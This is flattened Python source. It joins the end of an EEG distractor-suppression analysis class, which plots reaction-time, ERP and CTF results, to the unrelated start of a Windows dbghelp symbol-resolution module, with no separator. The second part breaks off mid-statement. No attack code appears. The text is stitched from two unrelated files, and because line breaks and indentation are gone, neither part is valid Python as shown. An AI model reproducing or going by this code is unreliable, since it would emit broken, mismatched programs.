np.savetxt(self.FolderTracker(['beh','analysis'], filename = 'gradient_JASP.csv'), gradient_array, delimiter = "," ,header = ",".join(headers), comments='') for cnd in ['DvTr','DrTv','DvTv']: plt.figure(figsize = (15,15 )) for i in range(4): ax = plt.subplot(2,2, i + 1, title = 'Repetition {}'.format(i) , ylim = yrange) if i % 2 == 0: plt.ylabel('RT (ms)') gradient[cnd].mean()[i].plot(kind = 'bar', yerr = gradient_err[cnd][i], color = 'grey') plt.tight_layout() plt.savefig(self.FolderTracker(['beh','analysis','figs'], filename = 'gradient_{}.pdf'.format(cnd))) plt.close() def primingCheck(self): ''' ''' # read in data file = self.FolderTracker(['beh','analysis'], filename = 'preprocessed.csv') beh = pd.read_csv(file) # filter out RT outliers DR = beh.query("RT_filter == True") # get effect of first repetition in distractor repetition block DR = DR.pivot_table(values = 'RT', index = 'subject_nr', columns = ['block_type','repetition'], aggfunc = 'mean') DR = DR['DrTv'][1] - DR['DrTv'][0] # get priming effect (only look at chance repetitions within DvTv); first get repetitions and then filter out outliers beh['priming'] = np.nan beh['priming'] = beh['priming'].apply(pd.to_numeric) rep = False for i, idx in enumerate(beh.index[1:]): if (beh.loc[idx - 1,'dist_loc'] == beh.loc[idx,'dist_loc']) and \ (beh.loc[idx -1 ,'subject_nr'] == beh.loc[idx,'subject_nr']) and \ (beh.loc[idx - 1,'block_cnt'] == beh.loc[idx,'block_cnt']) and \ (rep == False) and beh.loc[idx,'RT_filter'] == True and beh.loc[idx - 1,'RT_filter'] == True: rep = True beh.loc[idx,'priming'] = beh.loc[idx,'RT'] - beh.loc[idx - 1,'RT'] else: rep = False # get priming effect PR = beh.pivot_table(values = 'priming', index = 'subject_nr', columns = ['block_type'], aggfunc = 'mean')['DvTv'] t, p = ttest_rel(DR, PR) # plot comparison plt.figure(figsize = (15,10)) df = pd.DataFrame(np.hstack((DR.values,PR.values)),columns = ['effect']) df['subject_nr'] = range(DR.index.size) * 2 df['block_type'] = ['DR'] * DR.index.size + ['PR'] * DR.index.size ax = sns.stripplot(x = 'block_type', y = 'effect', data = df, hue = 'subject_nr', size = 10,jitter = True) ax.legend_.remove() sns.violinplot(x = 'block_type', y = 'effect', data = df, color= 'white', cut = 1) plt.title('p = {0:.3f}'.format(p)) plt.tight_layout() sns.despine(offset=10, trim = False) plt.savefig(self.FolderTracker(['beh','analysis','figs'], filename = 'priming.pdf')) plt.close() def splitHalf(self, header, sj_id, index): ''' ''' if header == 'dist_loc': block_type = 'DrTv' elif header == 'target_loc': block_type = 'DvTr' # read in beh file = self.FolderTracker(['beh','analysis'], filename = 'preprocessed.csv') beh = pd.read_csv(file) # create pivot (only include trials valid trials from RT_filter) RT = beh.query("RT_filter == True") RT_piv = RT.pivot_table(values = 'RT', index = 'subject_nr', columns = ['block_type','repetition'], aggfunc = 'mean')[block_type] # get repetition effect and sort effect = RT_piv[3] - RT_piv[0] if sj_id != 'all': effect = effect[sj_id] if index == 'index': sj_order = np.argsort(effect.values) elif index == 'sj_nr': sj_order = effect.sort_values().index.values groups = {'high':sj_order[:sj_order.size/2], 'low':sj_order[sj_order.size/2:]} return groups, block_type def indDiffBeh(self): ''' ''' # read in data file = self.FolderTracker(['beh','analysis'], filename = 'preprocessed.csv') beh = pd.read_csv(file) RT = beh.query("RT_filter == True") RT_piv = RT.pivot_table(values = 'RT', index = 'subject_nr', columns = ['block_type','repetition'], aggfunc = 'mean') target = RT_piv['DvTr'][0] - RT_piv['DvTr'][3] dist = RT_piv['DrTv'][0] - RT_piv['DrTv'][3] plt.figure(figsize = (30,10)) # plot correlation between target and distractor (repetition effect) r, p = pearsonr(target,dist) ax = plt.subplot(1,3, 1, title = 'r = {0:0.2f}, p = {1:0.2f}'.format(r,p)) sns.regplot(target, dist) plt.ylabel('distractor suppression') plt.xlabel('target facilitation') # plot individual learning effects (normalized data relative to first repetition) norm = RT_piv.values for i,j in [(0,4),(4,8),(8,12)]: norm[:,i:j] /= np.matrix(norm[:,i]).T normed_RT = pd.DataFrame(norm, index = np.unique(beh['subject_nr']), columns = RT_piv.keys()) ax = plt.subplot(1,3, 2, title = 'Distractor', xlabel = 'repetition', ylabel = 'RT (ms)') plt.plot(normed_RT['DrTv'].T) ax = plt.subplot(1,3, 3, title = 'Target', xlabel = 'repetition', ylabel = 'RT (ms)') plt.plot(normed_RT['DvTr'].T) plt.tight_layout() plt.savefig(self.FolderTracker(['beh','analysis','figs'], filename = 'individual.pdf')) plt.close() def timeFreqCTFInd(self, channel, header): ''' ''' # read in CTF data slopes, info = self.readCTFdata('all',channel, header, '*_slopes_all.pickle') times = info['times'] -250 freqs = (info['freqs'].min(), info['freqs'].max()) if header == 'dist_loc': conditions = ['DvTv_0','DvTv_3','DrTv_0','DrTv_3'] elif header == 'target_loc': conditions = ['DvTv_0','DvTv_3','DvTr_0','DvTr_3'] power = 'total' for sj in range(len(slopes)): crange = (-0.15,0.15) plt.figure(figsize = (20,15)) for i, cnd in enumerate(conditions): ax = plt.subplot(2,2, i + 1, title = cnd, ylabel = 'freqs', xlabel = 'time (ms)') xy = slopes[sj][cnd][power] plt.imshow(xy, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],freqs[1]], vmin = crange[0], vmax = crange[1]) plt.axvline(x=-250, ls = '--', color = 'white') plt.axvline(x=0, ls = '--', color = 'white') plt.colorbar(ticks = (crange[0],crange[1])) plt.tight_layout() plt.savefig(self.FolderTracker(['ctf',channel,'figs','ind'], filename = 'tf_{}_{}.pdf'.format(sj,header))) plt.close() def splitTimeFreqCTF(self, channel, header, perm = False): ''' ''' sj_id = np.array([1,2,3,4,5,6,7,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]) groups, block_type = self.splitHalf(header, sj_id, 'index') # read in ctf slopes, info = self.readCTFdata(sj_id,channel, header, '*_slopes_all.pickle') times = info['times'] freqs = (info['freqs'].min(), info['freqs'].max()) if perm: slopes_p, info = self.readCTFdata(sj_id, channel, header,'*_slopes_perm_all.pickle') crange = (-0.15,0.15) repeat = [] for power in ['total','evoked']: plt.figure(figsize = (20,15)) idx = 1 for rep in [0,3]: for group in groups.keys(): ax = plt.subplot(2,2, idx, title = 'rep_{}_{}'.format(rep,group), ylabel = 'freqs', xlabel = 'time (ms)') xy = np.stack([slopes[j]['{}_{}'.format(block_type,rep)][power] for j in groups[group]]) XY = np.mean(xy,axis = 0) if power == 'total' and rep == 3: repeat.append(np.swapaxes(xy,1,2)) if perm: xy_perm = np.stack([slopes_p[j]['{}_{}'.format(block_type,rep)][power] for j in groups[group]]) p_val, sig = permTTest(xy, xy_perm, p_thresh = 0.05) XY[sig == 0] = 0 plt.imshow(XY, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],freqs[1]], vmin = crange[0], vmax = crange[1]) plt.axvline(x=0, ls = '--', color = 'white') plt.axvline(x=250, ls = '--', color = 'white') plt.colorbar(ticks = (crange[0],crange[1])) idx += 1 plt.tight_layout() if perm: plt.savefig(self.FolderTracker(['ctf',channel,'figs'], filename = 'split_{}_{}.pdf'.format(header, power))) else: plt.savefig(self.FolderTracker(['ctf',channel,'figs'], filename = 'split_noperm_{}_{}.pdf'.format(header, power))) plt.close() def clusterTestTimeFreq(self, variable, repeat, times, freqs, channel,header, power): ''' ''' plt.figure(figsize = (30,10)) ax = plt.subplot(1,3, 1, title = 'variable', ylabel = 'freqs', xlabel = 'time (ms)') print 'variable' T_obs_plot = permTestMask2D(variable, p_value = 0.05) # plot 3rd - 1st repetition plt.imshow(T_obs_plot.T, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],freqs[1]], vmin = 0, vmax = 5) plt.colorbar(ticks = (0,5)) print 'repeat' ax = plt.subplot(1,3, 2, title = 'repeat', ylabel = 'freqs', xlabel = 'time (ms)') # plot 3rd - 1st repetition T_obs_plot = permTestMask2D(repeat, p_value = 0.05) plt.imshow(T_obs_plot.T, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],freqs[1]], vmin = 0, vmax = 5) plt.colorbar(ticks = (0,5)) print 'interaction' ax = plt.subplot(1,3, 3, title = 'interaction', ylabel = 'freqs', xlabel = 'time (ms)') # plot repeat - variable T_obs_plot = permTestMask2D([variable[1] - variable[0], repeat[1] - repeat[0]], p_value = 0.05) plt.imshow(T_obs_plot.T, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],freqs[1]], vmin = 0, vmax = 5) plt.colorbar(ticks = (0,5)) plt.tight_layout() plt.savefig(self.FolderTracker(['ctf',channel,'figs'], filename = 'TF_comparison_{}_{}.pdf'.format(header, power))) plt.close() def ipsiContraCheck(self, header, erp_name): ''' ''' # read in data with open(self.FolderTracker(['erp','dist_loc'], filename = 'plot_dict.pickle') ,'rb') as handle: info = pickle.load(handle) with open(self.FolderTracker(['erp','target_loc'], filename = '{}.pickle'.format(erp_name)) ,'rb') as handle: t_erps = pickle.load(handle) with open(self.FolderTracker(['erp','dist_loc'], filename = '{}.pickle'.format(erp_name)) ,'rb') as handle: d_erps = pickle.load(handle) print t_erps.keys(), d_erps.keys() plt.figure(figsize = (20,20)) titles = ['T0-left','T0-right', 'T3-left','T3-right','D0-left','D0-right','D3-left','D3-right'] for i, cnd in enumerate(['DvTr_0','DvTr_0','DvTr_3','DvTr_3','DrTv_0','DrTv_0','DrTv_3','DrTv_3']): ax = plt.subplot(4,2 , i + 1, title = titles[i], ylabel = 'mV') if i < 4: if i % 2 == 0: ipsi = np.vstack([t_erps[str(key)][cnd]['l_ipsi'] for key in t_erps.keys()]) contra = np.vstack([t_erps[str(key)][cnd]['l_contra'] for key in t_erps.keys()]) else: ipsi = np.vstack([t_erps[str(key)][cnd]['r_ipsi'] for key in t_erps.keys()]) contra = np.vstack([t_erps[str(key)][cnd]['r_contra'] for key in t_erps.keys()]) else: if i % 2 == 0: ipsi = np.vstack([d_erps[str(key)][cnd]['l_ipsi'] for key in d_erps.keys()]) contra = np.vstack([d_erps[str(key)][cnd]['l_contra'] for key in d_erps.keys()]) else: ipsi = np.vstack([d_erps[str(key)][cnd]['r_ipsi'] for key in d_erps.keys()]) contra = np.vstack([d_erps[str(key)][cnd]['r_contra'] for key in d_erps.keys()]) err, ipsi = bootstrap(ipsi) plt.plot(info['times'], ipsi, label = 'ipsi', color = 'blue') plt.fill_between(info['times'], ipsi + err, ipsi - err, alpha = 0.2, color = 'blue') err, contra = bootstrap(contra) plt.plot(info['times'], contra, label = 'contra', color = 'green') plt.fill_between(info['times'], contra + err, contra - err, alpha = 0.2, color = 'green') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') plt.tight_layout() plt.savefig(self.FolderTracker(['erp','figs'], filename = '{}-check-1.pdf'.format(erp_name))) plt.close() plt.figure(figsize = (20,20)) # plot repetition effect ax = plt.subplot(2,2 , 1, title = 'Target repetition Left', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DvTr_0','DvTr_3']): L_ipsi = np.vstack([t_erps[str(key)][cnd]['l_ipsi'] for key in t_erps.keys()]) L_contra = np.vstack([t_erps[str(key)][cnd]['l_contra'] for key in t_erps.keys()]) err, diff = bootstrap(L_contra - L_ipsi) perm.append(L_contra - L_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(2,2 , 2, title = 'Target repetition Right', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DvTr_0','DvTr_3']): R_ipsi = np.vstack([t_erps[str(key)][cnd]['r_ipsi'] for key in t_erps.keys()]) R_contra = np.vstack([t_erps[str(key)][cnd]['r_contra'] for key in t_erps.keys()]) err, diff = bootstrap(R_contra - R_ipsi) perm.append(R_contra - R_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(2,2 , 3, title = 'Distractor repetition Left', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DrTv_0','DrTv_3']): L_ipsi = np.vstack([d_erps[str(key)][cnd]['l_ipsi'] for key in d_erps.keys()]) L_contra = np.vstack([d_erps[str(key)][cnd]['l_contra'] for key in d_erps.keys()]) err, diff = bootstrap(L_contra - L_ipsi) perm.append(L_contra - L_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(2,2 , 4, title = 'Distractor repetition Right', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DrTv_0','DrTv_3']): R_ipsi = np.vstack([d_erps[str(key)][cnd]['r_ipsi'] for key in d_erps.keys()]) R_contra = np.vstack([d_erps[str(key)][cnd]['r_contra'] for key in d_erps.keys()]) err, diff = bootstrap(R_contra - R_ipsi) perm.append(R_contra - R_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') plt.tight_layout() plt.savefig(self.FolderTracker(['erp','figs'], filename = '{}-check-2.pdf'.format(erp_name))) plt.close() def N2pCvsPd(self, erp_name, split = False): ''' ''' sj_id = np.array([1,3,4,5,6,7,9,10,11,12,13,14,15,16,17,18,19,20,21]) # read in data with open(self.FolderTracker(['erp','dist_loc'], filename = 'plot_dict.pickle') ,'rb') as handle: info = pickle.load(handle) with open(self.FolderTracker(['erp','target_loc'], filename = '{}.pickle'.format(erp_name)) ,'rb') as handle: t_erps = pickle.load(handle) with open(self.FolderTracker(['erp','dist_loc'], filename = '{}.pickle'.format(erp_name)) ,'rb') as handle: d_erps = pickle.load(handle) if split: groups, block_type = self.splitHalf(split, sj_id, 'sj_nr') else: groups = {'all':t_erps.keys()} for group in groups.keys(): # get ipsilateral and contralateral erps tuned to the target and tuned to the distractor (collapsed across all conditions) #T_ipsi = np.vstack([t_erps[str(key)]['all']['ipsi'] for key in t_erps.keys()]) #T_contra = np.vstack([t_erps[str(key)]['all']['contra'] for key in t_erps.keys()]) T_ipsi = np.vstack([t_erps[str(key)]['all']['ipsi'] for key in groups[group]]) T_contra = np.vstack([t_erps[str(key)]['all']['contra'] for key in groups[group]]) #D_ipsi = np.vstack([d_erps[str(key)]['all']['ipsi'] for key in d_erps.keys()]) #D_contra = np.vstack([d_erps[str(key)]['all']['contra'] for key in d_erps.keys()]) D_ipsi = np.vstack([d_erps[str(key)]['all']['ipsi'] for key in groups[group]]) D_contra = np.vstack([d_erps[str(key)]['all']['contra'] for key in groups[group]]) plt.figure(figsize = (20,20)) # plot ipsi and contralateral erps with bootsrapped error bar ax = plt.subplot(4,2 , 1, title = 'Target ERPs', ylabel = 'mV') err, ipsi = bootstrap(T_ipsi) plt.plot(info['times'], ipsi, label = 'ipsi', color = 'blue') plt.fill_between(info['times'], ipsi + err, ipsi - err, alpha = 0.2, color = 'blue') err, contra = bootstrap(T_contra) plt.plot(info['times'], contra, label = 'contra', color = 'green') plt.fill_between(info['times'], contra + err, contra - err, alpha = 0.2, color = 'green') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(4,2 , 2, title = 'Distractor ERPs', ylabel = 'mV') err, ipsi = bootstrap(D_ipsi) plt.plot(info['times'], ipsi, label = 'ipsi', color = 'blue') plt.fill_between(info['times'], ipsi + err, ipsi - err, alpha = 0.2, color = 'blue') plt.legend(loc = 'best') err, contra = bootstrap(D_contra) plt.plot(info['times'], contra, label = 'contra', color = 'green') plt.fill_between(info['times'], contra + err, contra - err, alpha = 0.2, color = 'green') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') # plot diff wave collapsed across all conditions ax = plt.subplot(4,2 , 3, title = 'Target diff', ylabel = 'mV') err, diff = bootstrap(T_contra - T_ipsi) plt.plot(info['times'], diff, color = 'black') plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = 'black') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(4,2 , 4, title = 'Distractor diff', ylabel = 'mV') err, diff = bootstrap(D_contra - D_ipsi) plt.plot(info['times'], diff, color = 'black') plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = 'black') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') # plot repetition effect ax = plt.subplot(4,2 , 5, title = 'Target repetition', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DvTr_0','DvTr_3']): T_ipsi = np.vstack([t_erps[str(key)][cnd]['ipsi'] for key in groups[group]]) T_contra = np.vstack([t_erps[str(key)][cnd]['contra'] for key in groups[group]]) err, diff = bootstrap(T_contra - T_ipsi) perm.append(T_contra - T_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(4,2 , 6, title = 'Distractor repetition', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DrTv_0','DrTv_3']): D_ipsi = np.vstack([d_erps[str(key)][cnd]['ipsi'] for key in groups[group]]) D_contra = np.vstack([d_erps[str(key)][cnd]['contra'] for key in groups[group]]) err, diff = bootstrap(D_contra - D_ipsi) perm.append(D_contra - D_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') # plot repetition effect (control) ax = plt.subplot(4,2, 7, title = 'Target repetition (control)', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DvTv_0','DvTv_3']): T_ipsi = np.vstack([t_erps[str(key)][cnd]['ipsi'] for key in groups[group]]) T_contra = np.vstack([t_erps[str(key)][cnd]['contra'] for key in groups[group]]) err, diff = bootstrap(T_contra - T_ipsi) perm.append(T_contra - T_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(4,2, 8, title = 'Distractor repetition (control)', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DvTv_0','DvTv_3']): D_ipsi = np.vstack([d_erps[str(key)][cnd]['ipsi'] for key in groups[group]]) D_contra = np.vstack([d_erps[str(key)][cnd]['contra'] for key in groups[group]]) err, diff = bootstrap(D_contra - D_ipsi) perm.append(D_contra - D_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') sns.despine(offset=10, trim = False) plt.tight_layout() if split: plt.savefig(self.FolderTracker(['erp','figs'], filename = 'n2pc-Pd-{}-{}_{}.pdf'.format(group,split,erp_name))) else: plt.savefig(self.FolderTracker(['erp','figs'], filename = 'n2pc-Pd_{}_{}.pdf'.format(group,erp_name))) plt.close() def clusterTopo(self, header, fname = ''): ''' ''' # read in data files = glob.glob(self.FolderTracker(['erp', header], filename = fname)) topo = [] for file in files: with open(file ,'rb') as handle: topo.append(pickle.load(handle)) def topoAnimation(self, header): ''' ''' # read in data files = glob.glob(self.FolderTracker(['erp', header], filename = 'topo_*.pickle')) topo = [] for file in files: print file # read in erp dict with open(file ,'rb') as handle: topo.append(pickle.load(handle)) # read in processed data object (contains info for plotting) EEG = mne.read_epochs(self.FolderTracker(extension = ['processed'], filename = 'subject-1_all-epo.fif')) # read in plot dict with open(self.FolderTracker(['erp',header], filename = 'plot_dict.pickle') ,'rb') as handle: info = pickle.load(handle) plt_idx = [1,3,7,9] for image in range(564): f = plt.figure(figsize = (20,20)) for i, cnd in enumerate(np.sort(topo[0].keys())): ax = plt.subplot(3,3 , plt_idx[i], title = cnd) T = np.mean(np.dstack([np.mean(topo[j][cnd], axis = 0) for j in range(len(topo))]), axis = 2) mne.viz.plot_topomap(T[:,image], EEG.info, show_names = False, show = False, vmin = -4, vmax = 3) ax = plt.subplot(3,3 , 5, title = '{0:0.2f}'.format(info['times'][image])) if info['times'][image] <= 0: searchDisplayEEG(ax, fix = True) elif info['times'][image] <= 0.25: searchDisplayEEG(ax, fix = False) else: searchDisplayEEG(ax, fix = False, stimulus = 4, erp_type = header) plt.tight_layout() plt.savefig(self.FolderTracker(['erp', 'figs','video'], filename = 'topo_{0}_{1:03}.png'.format(header,image + 1))) plt.close() plt_idx = [1,3] for image in range(564): f = plt.figure(figsize = (20,20)) for i in range(2): if i == 0: title = 'variable' T = np.mean(np.dstack([np.mean(topo[j]['DvTv_0'], axis = 0) for j in range(len(topo))]), axis = 2) - \ np.mean(np.dstack([np.mean(topo[j]['DvTv_3'], axis = 0) for j in range(len(topo))]), axis = 2) else: T = np.mean(np.dstack([np.mean(topo[j]['DrTv_0'], axis = 0) for j in range(len(topo))]), axis = 2) - \ np.mean(np.dstack([np.mean(topo[j]['DrTv_3'], axis = 0) for j in range(len(topo))]), axis = 2) title = 'repeat' ax = plt.subplot(1,3 ,plt_idx[i] , title = title) mne.viz.plot_topomap(T[:,image], EEG.info, show_names = False, show = False, vmin = -1, vmax = 1) ax = plt.subplot(1,3 , 2, title = '{0:0.2f}'.format(info['times'][image])) if info['times'][image] <= 0: searchDisplayEEG(ax, fix = True) elif info['times'][image] <= 0.25: searchDisplayEEG(ax, fix = False) else: searchDisplayEEG(ax, fix = False, stimulus = 4, erp_type = header) plt.tight_layout() plt.savefig(self.FolderTracker(['erp', 'figs','video'], filename = 'topo_diff_{0}_{1:03}.png'.format(header,image + 1))) plt.close() if __name__ == '__main__': os.chdir('/home/dvmoors1/BB/Dist_suppression') PO = EEGDistractorSuppression() #PO.conditionCheck(thresh_bin = 1.00) # ANALYSIS PAPER #PO.diff_ERPS(elecs = ['PO7','PO3','O1'], erp_name= 'lat-down1-mid') #PO.diff_ERPS(elecs = ['PO7','PO3','O1'], erp_name= 'lat-down1') # Behavior plots #PO.repetitionRaw() #PO.spatialGradient() #PO.primingCheck() #PO.indDiffBeh() # CTF plots #PO.alphaSlopes() #PO.crossTraining() #PO.CTFslopes(header = 'target', ctf_name = 'slopes_alpha', fband = 'alpha') #PO.CTFslopes(header = 'dist', ctf_name = 'slopes_alpha', fband = 'alpha') #PO.timeFreqCTF(header = 'target', cnd_name = 'all', perm = False, p_map = False) #PO.timeFreqCTF(header = 'dist', cnd_name = 'cnds',perm = False, p_map = False) #PO.plotCTF(header = 'dist') #PO.plotCTF(header = 'dist') #PO.threeDSlopes(header = 'dist_loc') #PO.threeDSlopes(header = 'target_loc') #PO.rawCTF(header = 'dist_loc', ctf_name = 'ctf-raw') #PO.rawCTF(header = 'target_loc', ctf_name = 'ctf-raw') #PO.splitTimeFreqCTF(channel = 'posterior_channels', header = 'target_loc', perm = True) #PO.splitTimeFreqCTF(channel = 'posterior_channels', header = 'dist_loc', perm = True) # BDM plots #PO.bdmdiag() #PO.bdmACC(header = 'target') # ERP plots # PO.topoChannelSelection(header = 'dist_loc', topo_name = 'topo_lat-down1') # PO.erpInspection(header = 'dist_loc', erp_name = 'lat-down1') # PO.topoChannelSelection(header = 'target_loc', topo_name = 'topo_lat-down1') # PO.erpInspection(header = 'target_loc', erp_name = 'lat-down1') PO.diff_ERPS(elecs = ['PO7','PO3','O1'], erp_name= 'lat-down1') #PO.diff_ERPS(elecs = ['PO7','PO3','O1'], header = 'target', erp_name= 'lat-down1') #PO.cndTOPO('dist', start = 0.05, stop = 0.15, step = 0.01) #PO.cndTOPO('dist') # PO.ipsi_contra_ERPS(elecs = ['PO7','PO3','O1'], header = 'dist_loc', erp_name = 'lat-down1') # PO.ipsi_contra_ERPS(elecs = ['PO7','PO3','O1'], header = 'target_loc', erp_name = 'lat-down1') # PO.linkBehErp(elecs = ['PO7','PO3'], header = 'dist_loc', erp_name = 'lat-down1', window = (0.29,0.36)) # PO.linkBehErp(elecs = ['PO7','PO3'], header = 'target_loc', erp_name = 'lat-down1', window = (0.16,0.22)) # TARGET VS DISTRACTOR #PO.DT() import os.path import ctypes import copy import itertools from collections import namedtuple import windows import windows.generated_def as gdef from windows import winproxy DEFAULT_DBG_OPTION = gdef.SYMOPT_DEFERRED_LOADS + gdef.SYMOPT_UNDNAME def set_dbghelp_path(path): loaded_modules = [m.name.lower() for m in windows.current_process.peb.modules] if os.path.isdir(path): path = os.path.join(path, str(windows.current_process.bitness), "dbghelp.dll") if "dbghelp.dll" in loaded_modules: raise ValueError("setup_dbghelp_path should be called before any dbghelp function") # Change the DLL used by DbgHelpProxy winproxy.DbgHelpProxy.APIDLL = path return class SymbolInfoBase(object): # Init on ctypes struct is not always called # resolver & displacement should be set manually CHAR_TYPE = None def __init__(self, *args, **kwargs): self.resolver = kwargs.get("resolver", None) self.displacement = kwargs.get("displacement", 0) def as_type(self): # assert self.Address == 0 ? return SymbolType(self.Index, self.ModBase, self.resolver) @property def name(self): if not self.NameLen: return None size = self.NameLen addr = ctypes.addressof(self) + type(self).Name.offset return (self.CHAR_TYPE * size).from_address(addr)[:] @property def fullname(self): return str(self) @property def addr(self): return self.Address @property # Fixed ? def module(self): return self.resolver.get_module(self.ModBase) def __int__(self): return self.addr + self.displacement def __str__(self): if self.displacement: return "{self.module.name}!{self.name}+{self.displacement:#x}".format(self=self) return "{self.module.name}!{self.name}".format(self=self) def __repr__(self): if self.displacement: return '<{0} name="{1}" addr={2:#x} displacement={3:#x} tag={4}>'.format(type(self).__name__, self.name, self.addr, self.displacement, self.tag) return '<{0} name="{1}" addr={2:#x} tag={3}>'.format(type(self).__name__, self.name, self.addr, self.tag) class SymbolInfoA(gdef.SYMBOL_INFO, SymbolInfoBase): CHAR_TYPE = gdef.CHAR class SymbolInfoW(gdef.SYMBOL_INFOW, SymbolInfoBase): CHAR_TYPE = gdef.WCHAR # We use the A Api in our code (for now) SymbolInfo = SymbolInfoA class SymbolType(object): def __init__(self, typeid, modbase, resolver): # Inheritance ? self.resolver = resolver self._typeid = typeid # Kind of a handle. Different of typeid property. self.modbase = modbase def _get_type_info(self, typeinfo, ires=None): res = ires if res is None: res = TST_TYPE_RES_TYPE.get(typeinfo, gdef.DWORD)() windows.winproxy.SymGetTypeInfo(self.resolver.handle, self.modbase, self._typeid, typeinfo, ctypes.byref(res)) if ires is not None: return ires newres = res.value if isinstance(res, gdef.LPWSTR): windows.winproxy.LocalFree(res) return newres @property def name(self): return self._get_type_info(gdef.TI_GET_SYMNAME) @property def size(self): return self._get_type_info(gdef.TI_GET_LENGTH) @property def tag(self): return self._get_type_info(gdef.TI_GET_SYMTAG) # Diff type/typeid ? @property def type(self): return self.new_typeid(self._get_type_info(gdef.TI_GET_TYPE)) @property def typeid(self): return 